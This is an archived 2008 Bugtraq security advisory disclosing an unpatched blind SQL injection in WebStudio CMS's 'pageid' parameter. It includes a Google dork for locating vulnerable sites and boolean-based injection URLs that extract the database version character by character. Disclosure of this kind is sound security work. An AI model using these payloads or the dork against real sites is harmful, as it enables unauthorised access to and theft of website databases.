| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Mon, 24 Nov 2008 13:39:46 -0700 From: glafkos@...alavista.com To: bugtraq@...urityfocus.com Subject: WebStudio CMS 'pageid' Blind SQL Injection Application: WebStudio CMS Vendor Name: BDigital Media Ltd Vendors Url: http://www.bdigital.biz Bug Type: WebStudio CMS (pageid) Blind SQL Injection Vulnerability Exploitation: Remote Severity: Critical Solution Status: Unpatched Introduction: WebStudio CMS is a modular Web Content Management System solution. Google Dork: "Powered by WebStudio" Description: WebStudio CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. PoC: http://localhost/index.php?pageid=1+and+1=1 ( TRUE ) http://localhost/index.php?pageid=1+and+1=2 ( FALSE ) Exploit: http://localhost/index.php?pageid=1+and+substring(@@version,1,1)=3 ( TRUE ) http://localhost/index.php?pageid=1+and+substring(@@version,1,1)=4 ( FALSE ) http://localhost/index.php?pageid=1+and+substring(@@version,1,1)=5 ( FALSE ) Solution: There was no vendor-supplied solution at the time of entry. Edit source code manually to ensure user-supplied input is correctly sanitised. Credits: Charalambous Glafkos Email: glafkos (at) astalavista (dot) com ___________________________________________ ASTALAVISTA - the hacking & security community www.astalavista.com www.astalavista.net
Powered by blists - more mailing lists